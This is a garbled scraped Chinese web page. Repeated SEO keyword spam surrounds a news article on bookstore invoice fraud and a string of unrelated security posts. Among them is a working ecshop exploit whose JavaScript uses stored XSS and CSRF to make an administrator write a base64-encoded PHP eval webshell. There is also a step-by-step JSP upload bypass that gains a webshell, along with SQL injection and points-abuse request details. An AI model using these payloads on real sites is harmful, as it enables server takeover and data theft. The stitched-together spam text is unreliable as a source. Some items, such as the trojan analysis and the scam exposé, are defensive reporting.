杨锋在一站到底题库那一其出现过

|||||||||||||||||
&>>&&>>&&&&&正文
书店内买电池可开图书发票 回应:属管理漏洞moko001,,鸡皮肤疗养吧博客,一站到底,混在日本娱乐圈,吊单杠的好处,杨君刘小区,阳元醇,杭州孤山画室,任辰瑶,秀色 月梢,大理网,avlangdizhi,该隐打卡修斯,1111ss,万州人事网,新垣结衣国际后援会,朱丹和林涵,押切 媚姬,澜沧江边的蝴蝶会,2012it领袖峰会,非常金鸡任务,解放的潘多拉 bt,驯服妖孽爹地,勇者王05年修改版,金山画王2011免费下载,花嫁之迷情皇妃,袁天罡称骨歌详解,海畔馨苑,
moko001,,鸡皮肤疗养吧博客,一站到底,混在日本娱乐圈,吊单杠的好处,杨君刘小区,阳元醇,杭州孤山画室,任辰瑶,秀色 月梢,大理网,avlangdizhi,该隐打卡修斯,1111ss,万州人事网,新垣结衣国际后援会,朱丹和林涵,押切 媚姬,澜沧江边的蝴蝶会,2012it领袖峰会,非常金鸡任务,解放的潘多拉 bt,驯服妖孽爹地,勇者王05年修改版,金山画王2011免费下载,花嫁之迷情皇妃,袁天罡称骨歌详解,海畔馨苑,卜克环游记钻石岛,佛屠异世下载,新中国首位飞升者,琅琊榜广播剧,住吉会,优木818sj电视剧,修行太虚,www2.,刺花的灯罩,qlrcw,黄金渔场121107中宇,华汉神针,秀文笔q语录,御法度快播,抵达分水处,攀枝花在线,飞燕惊龙片尾曲,小啊姨叫慧林,邪帝宠后,缠绵悱恻天价前妻,沈眉庄扮演者斓曦,
书店内买电池可开图书发票 新京报记者 杨锋 摄
  昨日,记者在王府井书店购买4节电池,开出的发票项目一栏显示为“图书”。
  在书店不仅能买图书,还能买到家用电器与日用百货,而发票都能开成图书类别。
  根据市民提供的线索,昨日,新京报记者走访王府井书店、西单北京图书大厦与中关村图书大厦,三家书店多个非图书类柜台工作人员、收银员及开发票处工作人员明确表示,购买非图书类商品能开图书发票。
  对此,王府井书店六楼一负责人称,此为个案,系工作人员违规操作。西单北京图书大厦称原则上要求工作人员根据读者购买商品开具相应发票。中关村图书大厦宣传部门工作人员拒绝回应。
  地点:王府井书店
  买4节电池开出图书发票
  昨日,王府井书店6层左侧,有乐器销售区与体育用品店。右侧销售区则像极了超市,电吹风、高压锅、唇膏、床单等一应俱全。
  当记者询问6层收银台工作人员购买非图书类商品能否开发票时,这位工作人员回复说:“开图书、音像、办公用品都可以。”
  记者花10元从柜台买了4节5号电池,开发票时,收银台工作人员询问记者需要开哪一类后,不到2分钟,一张机打发票开出,上面收款单位与盖章均为“北京市新华书店王府井书店”,发票项目一栏则显示为“图书”。
  “这是我们管理上的漏洞。”一名自称是王府井书店6层负责人的男子表示,记者开出10元图书发票属个案,系工作人员违规操作,将对此进行核查,追查相关人员责任。
  地点:西单北京图书大厦
  “现金购物均能开图书发票”
  昨日,位于西单的北京图书大厦三楼,除图书外,也有钱包、电热水壶、相机、剃须刀等各类用品销售。记者以打算购买剃须刀的名义到柜台咨询,身着新华书店统一制服的柜台售货员明确告知,可以开具图书发票。
  “都是这么开的。”三楼苹果电脑柜台一位售货员及四楼钟表柜台售货员均表示,可以开具图书、音像发票。
  在大厦一楼南侧收银台,收银员说,只要是在大厦内用现金购买的物品,均可开图书发票。该说法获得发票开具处工作人员的证实。
  北京图书大厦一位负责人表示,北京图书大厦原则上是根据顾客购买商品的种类开具相应发票,书店内部也有相应的管理规定。出现记者反映的情况,是相关工作人员的问题。
  地点:中关村图书大厦
  配眼镜也可以开图书发票
  中关村图书大厦三楼收银台工作人员表示,只要是在大厦内用现金购买的任何物品,均可开具图书发票。在四楼,一处悬挂有“文化用品区”标志的柜台里,多数商品与“文化用品”无关:钟表、指甲刀、洗衣液……“都可以开图书发票。”该柜台工作人员称,只要拿着收银台的小票,就可去服务台开具发票。
  在大厦一楼,一家眼镜店店员表示,配眼镜亦可开具图书发票。
  “只有图书商品、非图书商品与其他三种类别。”大厦一楼发票开具处工作人员指着柜台上张贴的告示称。
  就工作人员所称“用现金购买的任何物品,均可开具图书发票”,中关村图书大厦宣传部门工作人员拒绝回应。
  【律师观点】
  发票与商品不符系违法
  大成律师事务所律师张文钧表示,书店出售非图书类用品却开具图书类发票,违反了〖中华人民共与国发票管理办法〗的规定。
  张文钧说,往往有消费者在购买了电脑、手机、电视等商品后,为自我报销方便,要求将有关发票的品名更改为图书、办公用品这类易于报销的产品,而商家为了促成生意,也乐于为消费者开具品名与实际不符的发票。这也为一些人提供了可乘之机,通过开具虚假发票达到假公济私的目的。
  本组稿件采写 新京报记者 杨锋
xzl ygg moko001,,鸡皮肤疗养吧博客,一站到底,混在日本娱乐圈,吊单杠的好处,杨君刘小区,阳元醇,杭州孤山画室,任辰瑶,秀色 月梢,大理网,avlangdizhi,该隐打卡修斯,1111ss,万州人事网,新垣结衣国际后援会,朱丹和林涵,押切 媚姬,澜沧江边的蝴蝶会,2012it领袖峰会,非常金鸡任务,解放的潘多拉 bt,驯服妖孽爹地,勇者王05年修改版,金山画王2011免费下载,花嫁之迷情皇妃,袁天罡称骨歌详解,海畔馨苑,卜克环游记钻石岛,佛屠异世下载,新中国首位飞升者,琅琊榜广播剧,住吉会,优木818sj电视剧,修行太虚,www2.,刺花的灯罩,qlrcw,黄金渔场121107中宇,华汉神针,秀文笔q语录,御法度快播,抵达分水处,攀枝花在线,飞燕惊龙片尾曲,小啊姨叫慧林,邪帝宠后,缠绵悱恻天价前妻,沈眉庄扮演者斓曦,
48小时点击排行小站会根据您的关注,为您发现更多,
看到喜欢的小站就马上关注吧!
下一站,你会遇见谁的梦想?
欢迎大家来到金盾安全网&打造网络安全全民化!我们的网址:&
黑客派人当网吧收银员合伙装黑客软件盗窃
 为配合千里之外的同伙杨某远程作案,两名嫌疑人先后应聘成为一网吧收银员,由杨某通过软件侵入网吧财务系统实施盗窃&&记者昨日从锦江区公安分局获悉,日前锦江警方破获了一起利用网络远程操控实施盗窃的案件,目前该案还在进一步深挖中。办案民警称,该案操作难度小、隐蔽程度高,提醒企业商家加强财务监管和用人考察,增强安全防范意识。  招收银员后 网吧收入少七千元  李强(化名)是下东大街某网吧老板。今年9月底,他收到丁某的求职简历,应聘职务是收银员。李强此时正缺人手,随即将其招进网吧。10月29日,另一名女孩郭某又找上门来,希望得到一份收银员的工作,并称多一个人管钱可以避免有人动手脚,而此时丁某也称一个人忙不过来,希望添个人手轮流值班。最终,这一唱一和说服了李强。  10月底,李强按照惯例回到网吧提款结账,却发现当月网吧营业额相较于以往的平均水平减少了近7000元。随后,李强在网吧进行了一次梳理,发现网吧收银机显示的金额与实际收到的现金不符,&我怀疑网吧出了&内鬼&,在收银机上动了手脚。&  李强在网吧内进行了一番查找,却一无所获&&除了营业额大幅下降之外,网吧所有人员和设备一切正常。但李强并不甘心,决定向亲友求助,在网吧内不动声色地来一次人工统计,暗中记下每天的营业额。经过连续几天的&反潜伏&行动,李强发现亲友统计的收入与收银机显示的相差了一截,问题可能就出在两名新招的收银员身上。李强随即于11月初赶到合江亭派出所报案。  &管家&原是被安插 里应外合牟取暴利  接到李强的报警,刑侦民警迅速介入调查,并在锦江区公安分局网监大队的配合下,掌握了收银员丁某和郭某涉嫌盗窃的确凿证据,遂在该网吧依法将两人挡获。  丁、郭二人对所犯事实供认不讳。据丁某交代,他们二人都是通过QQ聊天分别认识了网名叫做&校长&和&朱丹&的福建网友(经警方调查,&校长&和&朱丹&可能为同一嫌疑人)。&校长&告诉丁某称,他是一名电脑高手,可通过远程操作修改网吧财务系统,但前提需要丁某潜入网吧,以收银员的身份将一款软件安装在收银机上,从而里应外合牟取暴利。  为了不露马脚,配合丁某实施盗窃,&朱丹&又教唆郭某进入该网吧担任收银员,与丁某轮流值班。最终,由丁、郭二人与&校长&五五分成,谋取不义之财。其中,丁某分得赃款2000余元,郭某分得1000余元。  &这种手法难度小、隐蔽性高,其软件也适用于所有网吧收银机,值得警惕。&办案民警称,据了解,这是锦江区公安分局破获的首起里应外合、利用软件远程盗窃案。办案民警提醒,企业商家应加强财务监管和用人考察,增强安全防范意识,避免遭遇类似&无监盗&(责任编辑:小松)
日病毒预警
病毒名称: Trojan/Win32.Magania.bwsi[GameThief]  病毒类型: 木马  文件 MD5: C4B3397FDEFDCE015E01808  公开范围: 完全公开  危害等级: 3  文件长度: 30,841 字节  感染系统: Windows98以上版本  开发工具: Microsoft Visual C++ 6.0  加壳类型: UPX  病毒描述  该恶意代码文件为魔兽世界游戏盗号木马,病毒运行后遍历系统目录查找相同文件名找到后删除文件再衍生相同文件名的病毒文件到%Windir%\Downloaded Program Files\目录下,防止多个病毒文件产生的冲突,调用病毒自定义的函数&JUFndB4pARSJ&模块来提升进程权限,添加注册表病毒的CLSID值、HOOK启动项,删除System32%目录下的verclsid.exe文件,病毒运行完毕后使用CMD命令删除自身文件,试图将病毒DLL注入到所有进程中、安装消息钩子截取用户账号信息,读取游戏wtf目录下config.wtf配置文件获取用户账户信息后通过URL方式将截取账户信息及截取到得图片发送到作者指定的地址中。  行为分析-本地行为  1、文件运行后会释放以下文件  %Windir%\Downloaded Program Files\SvS2DJAQQTvtTYEU.Ttf  %Windir%\Downloaded Program Files\SjRjQgREDp3P8B4rEEg.cur  2、新增注册表  HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84639C2D-CD75-9AFCECBF19}\InprocServer32\@  值: 字符串: "C:\WINDOWS\system32\SrNRKs5F7Rkv9hp.inf"  描述:添加病毒注册表CLSID值  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{84639C2D-CD75-9AFCECBF19}  值: &值未设置&  描述:添加病毒HOOK启动项  3、调用病毒自定义的函数&JUFndB4pARSJ&模块来提升进程权限,添加注册表病毒的CLSID值、HOOK启动项,删除System32%目录下的verclsid.exe文件,病毒运行完毕后使用CMD命令删除自身文件,试图将病毒DLL注入到所有进程中、安装消息钩子截取用户账号信息,读取游戏wtf目录下config.wtf配置文件获取用户账户信息。  行为分析-网络行为  将截取到游戏账户信息以ULR方式通过以下参数回传到作者地址中  ?a=%s&u=%s&c=%s&mb=%s  --------------------------------------------------------------------------------  清除方案  手工清除请按照行为分析删除对应文件,恢复相关系统设置。  推荐使用ATool管理工具  (1)使用ATOOL管理工具,进程管理卸载被注入的病毒模块SjRjQgREDp3P8B4rEEg.cur  (2)删除病毒文件  %Windir%\Downloaded Program Files\SvS2DJAQQTvtTYEU.Ttf  %Windir%\Downloaded Program Files\SjRjQgREDp3P8B4rEEg.cur  (3)删除病毒添加的注册表项  HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{84639C2D-CD75-9AFCECBF19}\InprocServer32\@  值: 字符串:  "C:\WINDOWS\Downloaded Program Files\SjRjQgREDp3P8B4rEEg.cur"  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{84639C2D-CD75-9AFCECBF19}(责任编辑:小松)
黑客利用病毒点对点盗窃网银 网购谨防收款方被
&网购7000元镜头被刷光2万多&后续  网购遭遇电脑病毒骗钱的受害者在电脑 C 盘揪出病毒,是一个以 rar 结尾的压缩文件  共同点  接受过疑似木马病毒的东西,以及最后查询到钱都进了上海的同一家游戏公司  新病毒  以前的网银木马只会篡改交易对象,这种木马能同时修改交易金额,通过聊天软件发送文件传播,或者网页本身就带病毒  &功能&  用户&中毒&以后,就能时时监控中毒电脑,当监控到电脑正在使用网银的时候,病毒就会修改支付金额和收款方
  提醒  安装正规杀毒软件,按正规流程购物,别随便加QQ和MSN等,不要贸然接收卖家的各种链接和文件,付款时检查金额和付款方  吴先生在网上购买一款价值7000多元的单反镜头,付款后银行卡上2万多元余额不翼而飞&&昨日,华西都市报报道了最近不少&网购达人&遭遇最新木马病毒攻击,损失数万金额一事,引发强烈关注。  这到底是一种什么病毒?游戏公司是否存在问题?谁来承担责任?昨日,本报通过多方调查,这个新骗局和神秘病毒开始露出原形&&  受骗者说
  交易过程存在3个疑点  &自从被骗后,我一直在思考犯罪分子的作案手段是如何实现的。&最后,吴先生通过&实验&梳理出了几个关键节点。在受骗的一个月前,他准备购买单反镜头时,曾通过QQ加了一个&卖家&,对方传给他一张&照片&,他接收后却无法打开,仔细看发现是exe的执行文件,&这应该就是病毒,我当即就删除了,但它仍隐藏在了电脑中。&  10月19日,吴先生在购物网站拍下一款价值7000多元的镜头,并通过该网站配套的应用软件页面登录网银,预备向第三方支付软件付款。随即他通过该网站网页选择了网银,在选择&登录到网银付款&时,没有输入验证码,却提示&验证码错误&,在提示3次错误和输入3次验证码后,登录成功,但最后一次等待时间超过40秒。  随后,他输入银行账号、登录密码、验证码,页面左边订单金额为7700元,页面右边显示实际支付金额同样是7700元,吴先生点击&支付&,并输入支付密码以及U盾验证码。可连续两次都显示系统繁忙,当察觉到异样再登录网页查询余额时,他发现卡上2万多余额被刷光。  吴先生认为整个过程至少有3处明显疑点:1、跳转到网页页面之前,根本没有输入过验证码,却提示验证码错误;2、银行确认支付时,其实网页两侧瞬时出现过两个不同的金额,但时间只有0.1到0.2秒,之后看起来又一致了;3、网盾确认的时候,网页上金额与网盾不同,网盾显示的应该是2万多元。  而在成都,还有两名受害者,分别是双流县古女士,被骗走7000元;锦江区袁女士,被骗走15909元。她们自述被骗经过,跟吴先生描述的情况几乎如出一辙。  钱的去向
  大多购买游戏点卡充值  钱去了哪儿?吴先生说,他通过银行查询到,钱全部打进上海某游戏公司,他电话联系了该公司客服,并提供了订单号。该游戏公司客服称,确实有这笔进账记录,而钱全部购买了游戏点卡,并已充值到游戏账号。至于到底是谁在使用,以及吴先生要求暂时冻结账号的要求,对方都拒绝回应。  前日,记者加入了&&&&网银支付被骗&、&&&&维权一群&两个由被害者组成的QQ群,全国各地至少百人遭遇类似新型木马病毒攻击或钓鱼网站,最少被骗走123元,最多被骗走90000元。大多数人的共同点是:接受过疑似木马病毒的东西,以及最后查询到钱都进了上海的同一家游戏公司。  &&&&维权一群&中也有从事IT行业和法律行业的&三高&人士,他们猜测分析,&是游戏公司直接通过不法渠道收了这些钱,还是有黑客篡改了交易对象,利用游戏公司&洗钱&,暂时还不得而知。&  昨日,记者以玩家身份打进该游戏公司客服,并提供了吴先生被骗时的订单号,客服人员回答与吴先生表述一致。但当记者提出并非自愿出钱购买游戏点卡时,该客服人员称:&您可能遭遇了网购骗局,希望您尽快报警。&当记者问及是否接到过许多类似咨询时,对方予以否认。  后来,记者亮明身份,并希望联系到对方相关负责人,该客服人员称稍后会有人跟记者联系,并留下记者电话。但直到晚上8点记者截稿时,仍未收到任何回复。  律师说法
  当事人游戏公司都有责  到底谁来承担责任?不少受害者将责任指向购物网站、第三方支付平台、银行以及上海某游戏公司。因为对方存在安全漏洞。  昨日,记者联系了身在湖南咸宁的朱浩壬律师,他此前帮当地一名受害者代理了类似案件,该受害者是银行卡被&复制&损失数万元,钱也进了上海那家游戏公司。对方请他起草了一份民事赔偿诉状递交当地法院,后来该律师加入&&&&维权一群&。  &群里面大家的情况不完全相同,责任划分也不同。&朱律师说,他认为当事人和游戏公司,都是有责任的。&当事人疏忽接受了木马病毒。&朱律师说,但游戏公司也有责任,因为在接到市民投诉,交易情况出现异常时,至少应该暂时冻结使用那笔不明款项充值的游戏账号。  所以在他的诉状中,同样提及了游戏公司的责任问题,不过这一点被审理此案的法院驳回,法院认为游戏公司只有义务监管充值账号是否能够输入正确的订单号、付款项等,经过这些确认,游戏公司一旦认定为合法收入,就进入资金正常的使用流程。因其无法判断冻结账户要求是真是假,所以没有冻结账户的义务。  专家解密变种新型病毒能修改交易金额  神秘病毒来自哪里?受害者之一&网上CMS互动&在自己的电脑C盘里揪出了病毒,它是一个以rar结尾的压缩文件,名叫&刷钱挂&,只有100多兆,解压后便是个执行文件。大家分析,病毒名字会有不同,但&毒性&一样。  昨日,瑞星安全专家唐威在听完记者的表述后很肯定地说,这种病毒和此前的&网银超级木马&类似,不过是一种进行了变种的新型病毒,以前的网银木马只会篡改交易对象,这一种木马却能同时修改交易金额。&通过聊天软件发送文件传播,或者网页本身就带病毒。&  唐威说,用户&中毒&以后,黑客就能时时监控中毒电脑,当监控到电脑正在使用网银的时候,病毒就会修改支付金额和收款方。  而这种病毒最可怕的地方在于,很有可能是黑客对受骗者进行的点对点攻击,&黑客会通过一些渠道掌握受骗者的一些信息,比如经常采取网络支付,而且一般金额较大,热爱网购。&唐威说,这样会更加精准地行骗,比如会手工对病毒做一些变种处理,比如加上&免杀&的保护壳。&有些杀毒软件病毒库如果没有这种病毒类似,软件就不会查杀这一病毒。&唐威说,只有一些专业杀毒软件,不仅查杀病毒,还能对篡改交易金额和对象的异常行为进行拦截。  他也教大家做好防范,首先安装一些正规杀毒软件,在购物时按照正规流程购买,不要随便加QQ和MSN等,也不要贸然接收卖家的各种链接和文件,付款时仔细检查付款金额和付款方。  华西都市报记者谭梦媛实习生李思佳(责任编辑:小松)
研究员发现Apache设置不严 暴露server-status
 10月30日,国外安全研究人员发现由于对apache设置不严,导致服务器状态暴露于公网。本来apache有一个叫server-status 的功能,为方便管理员检查服务器运行状态的。它是一个HTML页面,可以显示正在工作的进程数量,每个请求的状态,访问网站的客户端ip地址,正在被请求的页面。  但是如果这个页面对公网开放,就会存在一些安全隐患,例如任何人口可以看到谁在访问网站,甚至包括一些本来隐藏的管理页面。  
&  以下是研究人员发现一些大型网站也存在这样的问题:  http://php.net/server-status/  /server-status/  /server-status/ (FIXED)  /server-status/ (FIXED)  /server-status/  /server-status/  /server-status/ (FIXED)  /server-status/  /server-status/  /server-status/  /server-status/  /server-status/  更多的列表看见:  http://urlfind.org/?server-status  修复方法:  http://httpd.apache.org/docs/2.2/mod/mod_status.html(责任编辑:小松)
小记拿kuke+jsp上漏洞分析
By:  0&00:百度被黑的思考  0&01:简单拿下kuke  0&02:谷歌一下+相关资料  0&03:对jsp漏洞的分析  0&04:对oracle脱裤科普  0&00:百度被黑的思考  先看下漏洞信息:  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  百度分站任意文件上传    注册  然后上传资质文件  传jsp木马  然后查看资质信息  ps:jsp架构的网站一般对上传过滤不严格  &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  
&  说实话哈,这种漏洞还是多次暴雷的出现在大型站点上&..  由于jsp多出现在大型站点+gov+edu上所以请大家把握尺度,不要做错非法行动。  0&01:简单拿下kuke  现在就以kuke这个jsp站点进行实例分析。  首先拜祭比较文艺范的主页:  
&  对于这种站点主站一般漏洞比较不明显,一般走向是对2级站点进行漏洞收集,  二就是通过注册用户检测上传过滤情况,三就是曲线救国了。  这里选择注册用户检测上传过滤情况,点击注册后,自动跳转到一个二级域名(看来还是二级域名的漏洞)。  注册了一个用户:
&  修改资料的地方有头像上传,选择图片后,直接弹出如图所示的提示,明显的javascript本地验证(详见突破上传总结):  
&  将jsp木马改为jpg,用burp截断上传(这里就不用修改javascript验证了)。  
&  截断的数据中将jpg改为jsp。  
&  成功获取webshell。  
&  当然是不是就只有这种拿站的方法,当你选择第二条扫描旁站漏洞时你会扫除jsp编辑器。  /ewebeditor/admin/login.jsp   /FCKeditor/editor/fckeditor.html  /FCKeditor/editor/dialog/fck_about.html  
&  0&02:谷歌一下+相关资料  由于jsp站点就构造下语句搜索下  inurl:upload.jsp 上传  
&  很不幸的是,第一个站就和上面一样轻松的被沦陷&.(请不要捅菊花)  
&  在网上看了相关资料,发现这是普遍存在都情况  腾讯:  
&  多玩YY:  
&  激动网:  
&  12320:   (责任编辑:小松)
苏宁易购某分站盲注+nginx解析漏洞
苏宁易购某分站盲注+nginx解析漏洞,还有另一分站的目录浏览,导致用户信息泄漏。  详细说明:站点1:苏宁应用商店   其中/feedback.php页面的contact和contactus参数存在漏洞。  用benchmark函数判断存在盲注~  
&  数据库  
&  可依次获取表,字段等。管理员密码采用MD5加密,不过苏宁商店的用户(不到100个)的密码是加了盐的 0.0  
&  另外,该站点还存在nginx解析漏洞~  
&  站点2: 供应链系统  页面/ihsdata/存在目录浏览漏洞  
&  其中  /ihsdata/company/  /ihsdata/meeting/  存有大量供应商信息  
&  修复方案:  1. 过滤  2. 取消目录浏览(责任编辑:小松)
京东商城刷积分(已修复)
京东商城购物完成后,评价大于100元的商品,可以获得2积分.但订单没有判断是否是自己的订单.可遍历订单号.刷积分.  POST /JdVote/TradeComment.aspx?ruleid=订单ID HTTP/1.1  Host:   Connection: keep-alive  Content-Length: 2171  Cache-Control: max-age=0  Origin:   User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1  Content-Type: application/x-www-form-urlencoded  Accept: text/html,application/xhtml+xml,application/q=0.9,*/*;q=0.8  Referer: /JdVote/TradeComment.aspx?ruleid=订单ID  Accept-Encoding: gzip,deflate,sdch  Accept-Language: zh-CN,q=0.8  Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3  Cookie: //选择自己登录帐号的cookie  __VIEWSTATE=%2FwEPDwUKLTUwMDExOTM4NmRkZrYhmLNgGlJ8UkLhdtmyQgAAAAA%3D&__EVENTVALIDATION=%2FwEWAgLJwd6dDgLhzbL9DzQla7Kw%2FebVQMxO6TJAYW8AAAAA&hischeck1=1...此处抓取随便一次评价的表单内容  
&  修复方案:  评价后台先判断是否自己的订单(责任编辑:小松)
ecshop csrf getshell 0day
0x0 后台getshell  在提交订单的地方看到了代码调用了get_mail_template()获得remind_of_new_order模板的内容,然后放入到fetch中执行,如果可以控制remind_of_new_order模板的内容那就可以让ecshop执行我们的命令了。www.ashker.NEt  在后台可以在模板管理中找到邮件模板,更改remind_of_new_order的内容为  {$phpinfo()'];phpinfo();/*}  然后在调试中可以看到代码被替换成了"_var['phpinfo()'];phpinfo();/*']; ?&"  代码成功执行。  0x1 前台xss  前台在有些地方过滤不够充分,导致用户可以构造恶意javascript完成对后台管理员的xss攻击。  注册用户以后随便买个东西,收货人信息里电话一栏只有本地的客户端检查,而没有后端过滤,容易招到xss攻击。  
&  0x2 xss+后台getshell  上面的两个相结合  由于没有csrf的防护,因此可以前台xss到后台并让管理员帮我们getshell。
  以下是实现getshell的js:  Var Shelldata='subject=%C3%DC%C2%EB%D5%D2%BB%D8&mail_type=0&tpl=1&content=%7B%24user_name%27%5D%3Bfile_put_contents%28base64_decode%28%27c2hlbGwucGhw%27%29%2Cbase64_decode%28%27PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4%3D%27%29%29%3Becho+%24var%5B%27%24user_name%7D%0D%0A%3C%2Fp%3E%0D%0A%3Cp%3E%7B%24user_name%7D%C4%FA%BA%C3%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%C4%FA%D2%D1%BE%AD%BD%F8%D0%D0%C1%CB%C3%DC%C2%EB%D6%D8%D6%C3%B5%C4%B2%D9%D7%F7%A3%AC%C7%EB%B5%E3%BB%F7%D2%D4%CF%C2%C1%B4%BD%D3%28%BB%F2%D5%DF%B8%B4%D6%C6%B5%BD%C4%FA%B5%C4%E4%AF%C0%C0%C6%F7%29%3A%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%3Ca+target%3D%22_blank%22+href%3D%22%7B%24reset_email%7D%22%3E%7B%24reset_email%7D%3C%2Fa%3E%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%D2%D4%C8%B7%C8%CF%C4%FA%B5%C4%D0%C2%C3%DC%C2%EB%D6%D8%D6%C3%B2%D9%D7%F7%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%7B%24shop_name%7D%3Cbr+%2F%3E%0D%0A%7B%24send_date%7D%3C%2Fp%3E'; try{ var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); xml.open("POST",'/ecshop/upload/admin/mail_template.php?act=save_template',false); xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xml.onreadystatechange = function(){if(xml.readyState == 4){}}; xml.send(Shelldata); }catch(e){}  上传这个js的图片并引用或者直接从外部网站引用都可以。为了测试方便,从本地引用  
&  最后提交订单,管理员访问该订单  然后用户前台找回密码,根目录下生成一句话shell.php,密码207.(责任编辑:小松)
dedeCMS最新注入漏洞一枚(补丁修复)
要描述:    由于对参数的变量未作初始化检测及使用了类反射的技巧导致 plus\feedback.php 中变量 $typeid 存在注入风险。  详细说明:  由于官方已经发布补丁,而且漏洞未提供POC攻击代码,故此漏洞提前公开。  补丁地址:/551651.html  构造的方式我不提供了,但是你有心阅读下代码就会明白了。  ...  if($comtype == 'comments')  {  $arctitle = addslashes($title);  if($msg!='')  {  $inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)  VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml-&M_ID}','0','0','$feedbacktype','$face','$msg'); ";  $rs = $dsql-&ExecuteNoneQuery($inquery);  if(!$rs)  {  ShowMsg(' 发表评论错误! ', '-1');  //echo $dsql-&GetError();  exit();  }  }  }  //引用回复  elseif ($comtype == 'reply')  {  $row = $dsql-&GetOne("SELECT * FROM `dede_feedback` WHERE id ='$fid'");  $arctitle = $row['arctitle'];  $aid =$row['aid'];  $msg = $quotemsg.$  $msg = HtmlReplace($msg, 2);  $inquery = "INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)  VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml-&M_ID}','0','0','$feedbacktype','$face','$msg')";  $dsql-&ExecuteNoneQuery($inquery);  }  下面我给出一张带了echo信息的问题结果演示。  
&  修复方案:  今天突发想作作代码审计,dedecms中HTTP的输入上用类反射这个技巧第一次见(好吧,我承认我是第一次玩PHP代码审计)。  建议考虑在反射上作得全面点,支持输入参数的类型和开发对应的过滤器作到更灵活更安全,这会给你们解决其中很多没反馈的问题。(责任编辑:小松)
揭穿一个非常高端的淘宝店铺骗局
 首先说下,通俗点楼主是做网站的,今天css森林群里大白发现了一家淘宝店铺利用装修实现虚假产品销售情况的骗局。楼主看了下代码确认是骗子,于是准备直播更新骗局的实现原理,希望大家警觉不要上当。为了和谐的购物,大家转起啊!!  情况如下,你们知道这个框出来的地方是假的吗!  
&  首先介绍下店铺装修的基础,简单的说一个网页是由html和css以及一些js效果呈现出来的,html如人的骨骼,css就是外表装饰,js控制页面的效果,类似神经。而淘宝店铺装修就是用css来控制页面的显示效果。这个骗局用到的是css里的background属性,意思就是为一个区域设置一个背景图,这是骗局实现的关键所在,页面虚假的东西都是有背景图片呈现的。  先来看第一处,30天销售数量  
&  从左下角的html中可以看出,实际销售量是0,但是右下角店铺利用css把0右移一点,左边空出的地方用了一个背景图58构成了580件的销售量。  第二处,购物须知,被改成了&优质商家 7天无理由退换&  
&  第三处同理,评价数和成交数也被修改了  
&  第四处,评价自然也是假的。  
&  大概就是这样子了,卖家的信用构成基本是话费刷的。  
&  此店难逃举报和惩罚,希望其他店家看到此贴不要效仿,做人要厚道,好生意是靠信用积累的,不是欺骗。对于非互联网工作的同学可能不知道要怎么辨别,其实有个很简单的技巧就是,背景图是无法选中的,你只要选中文字就可以看到真实还是欺骗。  
&  via douban(责任编辑:小松)
解读十大手机安全问题
移动性最强的设备就是手机,而手机往往存在安全问题。毋庸置疑,移动设备正在成为网络犯罪分子的目标。据报道,针对移动设备的恶意软件的变种数已上升至约14,000至40,000,在不到一年的时间,这个增长比例达到了185%。  移动设备面临着一系列的威胁,利用这些设备中常见的漏洞,可能泄露个人的因素。私人公司和相关的机构已经采取步骤,提高了安全性的移动设备,包括一定的控制供消费者使用,并且相关机构试图颁布有关法规或者建议在移动安全实践上,但是,安全控制并不总是贯彻落实在移动设备上,目前还不清楚消费者是否知道在他们的设备上启用安全控制。  有报告总结了十大手机安全问题,如下:  1、移动设备往往不启用密码。移动设备通常缺乏密码来验证用户和控制对存储在设备上的数据的访问。许多设备的技术能力,支持密码,个人识别码(PIN),或进行身份验证模式屏幕锁定。一些移动设备还包括一个扫描的指纹进行身份验证的生物识别读卡器。不过,调查显示,消费者很少使用这些机制。此外,如果用户不使用密码或PIN,他们往往会选择可以很容易地确定或绕过密码或PIN,如。如果没有密码或PIN锁定装置,有增加的风险,被盗或丢失的手机的信息,可以访问未经授权的用户可以查看敏感信息和误用移动设备。  2、双因素身份验证时,并非总是用于在移动设备上进行敏感交易。根据研究显示,消费者普遍使用的静态密码,而不是双因素身份验证,同时使用移动设备时进行敏感的交易。使用静态密码进行身份验证有安全缺陷:可以猜到的密码,忘记了,写下来和被盗,或窃听。双因素身份验证通常比传统的密码和PIN码,提供了更高级别的安全性和更高水平可能。双因素指的是身份验证系统中,用户需要使用至少两种不同的&因素& :你知道的东西,你拥有的东西等。在被授予访问时进行身份验证。移动设备可用于在某些双因素认证方案的第二个因素。移动设备可以产生通过代码,这些代码可以通过短信发送到手机。如果没有双因素身份认证,这就增加了移动设备的风险,未经授权的用户可以获取对敏感信息的访问和滥用移动设备。  3、无线传输加密。在通信过程中通常是不加密??的移动设备发送的信息,如电子邮件。此外,许多应用程序并不是他们在网络上发送和接收的数据进行加密,很容易被截获的数据。例如,如果一个应用程序传输数据的一个未加密的WiFi网络使用HTTP(而不是安全的HTTP),数据可以很容易被截获。当一个无线传输的数据没有加密,可以很容易被截获。  